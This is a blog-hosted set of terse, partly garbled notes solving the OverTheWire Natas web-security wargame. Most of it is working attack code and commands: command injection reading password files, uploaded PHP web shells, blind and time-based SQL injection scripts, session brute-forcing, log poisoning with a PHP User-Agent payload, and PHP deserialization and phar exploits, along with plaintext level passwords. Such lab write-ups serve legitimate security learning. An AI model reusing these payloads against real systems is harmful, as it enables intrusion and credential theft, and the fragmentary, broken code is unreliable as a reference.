您现在的位置是:首页 >其他 >Overthewire--natas网站首页其他

Overthewire--natas

DaisyDragonD 2023-07-08 04:00:03
简介Overthewire--natas

3 Not even Google will find it this time
http://natas3.natas.labs.overthewire.org/robots.txt

4 tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm

change refere:

9 command injection
;cat /etc/natas_webpass/natas10
; is to seperate the grep -i command

  1. command injection
    . /etc/natas_webpass/natas11

<?php function xor_encrypt($in) { $key = json_encode(array("showpassword"=>"no", "bgcolor"=>"#ffffff")); $text = $in; $outText = ''; // Iterate through each character for($i=0;$i

nano natas11.php

<? passthru("cat /etc/natas_webpass/natas13");?>

curl -u natas12:YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG http://natas12.natas.labs.overthewire.org/ -F “uploadedfile=@natas11.php” -F “filename=natas11.php”

burpsuite:
change jpg to php

nano natas11.php
GIF87a

<? passthru("cat /etc/natas_webpass/natas13");?>

curl -u natas13:YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG http://natas13.natas.labs.overthewire.org/ -F “uploadedfile=@natas11.php” -F “filename=natas11.php”

burpsuite:
change jpg to php

Content-Disposition: form-data; name=“filename”

rc74vy46dy.php

  1. sql injection
    "+or+1=1#

15 sql injection

username=natas16"+AND+LENGTH(password)>n#
username=natas16"+AND+substr(password,1,1)+like+binary+“%A%”#

BINARY when sql injection is not sensitive to the lowercase and uppercase

n=32

TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V

target = ‘http://natas15.natas.labs.overthewire.org’
charset_1 = “adfgijklqruADEHOPRTVZ23579”

password = “”
while len(password) != 32:
for c in charset_1:
t = password + c
username = (‘natas16" AND password LIKE BINARY "’ + t +‘%" "’)
r = requests.get(target,
auth=(‘natas15’,‘TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB’),
params={“username”: username}
)
if “This user exists” in r.text:
print ('PASS: ’ + t.ljust(32, ‘*’))
password = t
break

16… import requests
from requests.auth import HTTPBasicAuth

auth=HTTPBasicAuth(‘natas16’, ‘TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V’)

filteredchars = ‘’
passwd = ‘’
allchars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890’
for char in allchars:
r = requests.get(‘http://natas16.natas.labs.overthewire.org/?needle=doomed$(grep ’ + char + ’ /etc/natas_webpass/natas17)’, auth=auth)

if ‘doomed’ not in r.text:
filteredchars = filteredchars + char
print(filteredchars)

for i in range(32):
for char in filteredchars:
r = requests.get(‘http://natas16.natas.labs.overthewire.org/?needle=doomed$(grep ^’ + passwd + char + ’ /etc/natas_webpass/natas17)', auth=auth)

if ‘doomed’ not in r.text:
passwd = passwd + char
print(passwd)
break

grep ^ $
are meta-characters that respeectively match the empty string at the beginning and end of a line

17.username=natas18"+AND+substring(password,1,1)+like+binary+“%8%”+AND+sleep(5)#

import requests
from requests.auth import HTTPBasicAuth

Auth=HTTPBasicAuth(‘natas17’, ‘XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd’)
headers = {‘content-type’: ‘application/x-www-form-urlencoded’}
filteredchars = ‘’
passwd = ‘’
allchars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890’

for char in allchars:
payload = ‘username=natas18%22+and+password+like+binary+%27%25{0}%25%27+and+sleep%281%29+%23’.format(char)
r = requests.post(‘http://natas17.natas.labs.overthewire.org/index.php’, auth=Auth, data=payload, headers=headers)
if(r.elapsed.seconds >= 1):
filteredchars = filteredchars + char
print(filteredchars)

print(filteredchars)

for i in range(0,32):
for char in filteredchars:
payload = ‘username=natas18%22%20and%20password%20like%20binary%20’{0}%25’%20and%20sleep(1)%23’.format(passwd + char)
r = requests.post(‘http://natas17.natas.labs.overthewire.org/index.php’, auth=Auth, data=payload, headers=headers)
if(r.elapsed.seconds >= 1):
passwd = passwd + char
print(passwd)
break

#!/bin/python3
import requests
maxid = 641
url = “http://natas18.natas.labs.overthewire.org”
user = “natas18”
passwd = “8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s”
match = “You are an admin. The credentials for the next level are:”

for i in range(maxid):
c = dict(PHPSESSID=str(i))
h = requests.get(url, auth=(user, passwd), cookies=c)
print(i)

if match in str(h.content):
    print (h.content)
    break

#!/bin/python3
import requests
import binascii

def str2byte(s):
return bytes(s, encoding=‘utf-8’)

def byte2hex(b):
return ‘’.join([hex(n)[2:].rjust(2,‘0’) for n in b])

def str2hex(s):
return byte2hex(str2byte(s))

maxid = 641
user = “natas19”
passwd = “8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s”
url = “http://”+user+“.natas.labs.overthewire.org”
admin = ‘-admin’
match = “You are an admin. The credentials for the next level are:”

for i in range(maxid):
c = dict(PHPSESSID=str2hex(str(i)+admin))
h = requests.get(url, auth=(user, passwd), cookies=c)
print (i)
if match in str(h.content):
print (h.content)
break

burp suite:
intruder

20.admin%0Aadmin%201

admin
admin 1
Username: natas21
Password: 89OWrTkGmiLZLv12JY4tLj2c4FW0xn56

add:
admin=1
delete PHPSESSID=
get a new one paste it in the last page’s cookie session

22.GET /?revelio&admin=1 HTTP/1.1

23.111iloveyou

24
if(!strcmp($_REQUEST[“passwd”],“”))
passwd[]

25
GET /?lang=…//…//…//…//…//var/www/natas/natas25/logs/natas25_1111.log HTTP/1.1
Host: natas25.natas.labs.overthewire.org
User-Agent: <? passthru("cat /etc/natas_webpass/natas26");?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic bmF0YXMyNTpPOVFEOURaQkRxMVlwc3dpVE01b3FNRGFPdHVadEFjeA==
Connection: close
Referer: http://natas25.natas.labs.overthewire.org/?lang=en
Cookie: __utma=176859643.158281406.1678403383.1682021919.1682028223.37; __utmz=176859643.1681183138.20.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmc=176859643; __utmb=176859643.1.10.1682028223; __utmt=1; PHPSESSID=1111
Upgrade-Insecure-Requests: 1

26

<?php class Logger{ private $logFile; private $initMsg; private $exitMsg; function __construct($file){ // initialise variables $this->initMsg="#--session started--# "; $this->exitMsg="natas27:<? include '/etc/natas_webpass/natas27'; ?>"; 
        $this->logFile = "img/ccr69c3h6thiqn5m68tm2h8hpm.php";
    }

       function log($msg){
               ;     
       }

    function __destruct(){
       ;
    }
 }

$payload = new Logger(“ccr69c3h6thiqn5m68tm2h8hpm”);

echo urlencode(base64_encode(serialize($payload)));

?>

output:Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czozNDoiaW1nL2NjcjY5YzNoNnRoaXFuNW02OHRtMmg4aHBtLnBocCI7czoxNToiAExvZ2dlcgBpbml0TXNnIjtzOjIyOiIjLS1zZXNzaW9uIHN0YXJ0ZWQtLSMKIjtzOjE1OiIATG9nZ2VyAGV4aXRNc2ciO3M6NTE6Im5hdGFzMjc6PD8gaW5jbHVkZSAnL2V0Yy9uYXRhc193ZWJwYXNzL25hdGFzMjcnOyA
PHPSESSID==

http://natas26.natas.labs.overthewire.org/img/ccr69c3h6thiqn5m68tm2h8hpm.php

#!/usr/bin/env python

-- coding: utf-8 --

import requests
import re

allchar = ‘abcdefABCDEF’
s = 10
maxtime = 100
username = ‘natas27’
password = ‘PSO8xysPi00WKIiZZ6s6PtRmFy9cbxj3’
match = “Welcome”
url = ‘http://%s.natas.labs.overthewire.org/’ % username

session = requests.Session()

for j in range(maxtime):

response = session.post(url, data = {"username": "natas28" + "x00"*j +"xxxx", "password": "11" },auth =(username,password))
print(response.text)
response = session.post(url, data = {"username": "natas28" , "password": "11" },auth =(username,password))

print(j)
print(response.text)

if match in str(response.text): 
	print(response.text)
	break

G%2bglEae6W/1XjA7vRm21nNyEco/c%2bJ2TdR0Qp8dcjPItlMM3qTizkRB5P2zYxJsbWnPci/qKte0ohRTkObF%2bT5ujPcGtKfnu/mSL/syLoz0xm5xtyst2O9VZ/szQKTUzc4pf%2b0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI%3d

import requests
import urllib
import base64
url = “http://natas28.natas.labs.overthewire.org”
s = requests.Session()
#basic auth
s.auth = (‘natas28’, ‘skrwxciAe6Dnb0VfFDzDEHcCzQmv3Gd4’)

First we generate a baseline for the header/footer

data = {‘query’:10 * ’ ‘}
r = s.post(url, data=data)
baseline = urllib.parse.unquote(r.url.split(’=‘)[1])
baseline = base64.b64decode(baseline.encode(‘utf-8’))
header = baseline[:48]
#Manually analyze response to extract the information we need out of the HTML response
footer = baseline[48:]
sqli = 9 * " " + "’ UNION SELECT password FROM users;#"
data = {‘query’:sqli}
r = s.post(url, data=data)
exploit = urllib.parse.unquote(r.url.split(‘=’)[1])
exploit = base64.b64decode(exploit.encode(‘utf-8’))
#Calculating the size of the payload
nblocks = len(sqli) - 10
while nblocks % 16 != 0:
nblocks += 1
nblocks = int(nblocks / 16)
final = header + exploit[48:(48 + 16 * nblocks)] + footer
print(exploit[48:(48 + 16 * nblocks)])
final_ciphertext = base64.b64encode(final)
print(final_ciphertext)
search_url = “http://natas28.natas.labs.overthewire.org/search.php”
resp = s.get(search_url, params={“query”:final_ciphertext})
print(resp.text)

file=|ls%00

|cat +index.pl%00

|cat+/etc/na’tas_webpass/nat’as30%00

30
quote(param(‘username’))

username=natas30&password=‘a’+or+1&password=2

The problem mostly doesn’t lie with quote per se. quote is secure if used properly (although it’s not the best choice in this situation). However, if param is the param from CGI.pm, or from anything else that has similar behavior, you have a big problem.

You see, param is context-sensitive. In scalar context, if the parameter has a single value (name=foo), it returns that value, and if the parameter has multiple values (name=foo&name=bar) it returns an arrayref. In list context, it returns a list of values, whether there are zero, one, or many. The argument list of a method (such as quote) is a list context. That means that someone using your app can cause quote to receive two values, and quote’s optional second argument is an SQL data type that the first argument should be treated as. If the data type is a non-string type like NUMERIC, then quote will pass its first argument through without any quoting. This constitutes an opportunity for SQL injection.

curl -u natas31:AMZF14yknOn9Uc57uKB02jnYuhplYka3 “http://natas31.natas.labs.overthewire.org/index.pl?/etc/natas_webpass/natas32” -F “file=ARGV” -F “file=@natas31.csv”

curl -u natas32:Yp5ffyfmEdjvTOwpN5HCvh7Ctgf9em3G “http://natas32.natas.labs.overthewire.org/index.pl?ls%20-l%20.%20|” -F “file=ARGV” -F “file=@natas31.csv”

natas32

.:
total 156
drwxr-x--- 5 natas32 natas32 4096 Apr 23 18:01 bootstrap-3.3.6-dist
-rwsrwx--- 1 root natas32 16096 Apr 23 18:01 getpassword
-rw-r--r-- 1 root root 9740 Apr 23 18:01 index-source.html
-r-xr-x--- 1 natas32 natas32 2968 Apr 23 18:01 index.pl
-r-xr-x--- 1 natas32 natas32 97180 Apr 23 18:01 jquery-1.12.3.min.js
-r-xr-x--- 1 natas32 natas32 16877 Apr 23 18:01 sorttable.js
drwxr-x--- 2 natas32 natas32 4096 Apr 30 10:39 tmp

curl -u natas32:Yp5ffyfmEdjvTOwpN5HCvh7Ctgf9em3G “http://natas32.natas.labs.overthewire.org/index.pl?./getpassword%20|” -F “file=ARGV” -F “file=@natas31.csv”

-natas33.php

<?php echo shell_exec('cat /etc/natas_webpass/natas34'); ?>

upload and change file name

-natas33-create-phar.php

<?php class Executor { private $filename = "natas33.php"; private $signature = True; private $init = false; } $phar = new Phar("natas33-phar.phar"); $phar->startBuffering(); $phar->addFromString("natas33-phar.txt", 'natas33-phar'); $phar->setStub("<?php __HALT_COMPILER(); ?>"); 
    $o = new Executor();
    $phar->setMetadata($o);
    $phar->stopBuffering();

?>

-php natas33-create-phar.php
===> natas33-create-phar.phar

upload and change file name

-phar://natas33-phar.phar/natas33-phar.txt

风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。

站长推荐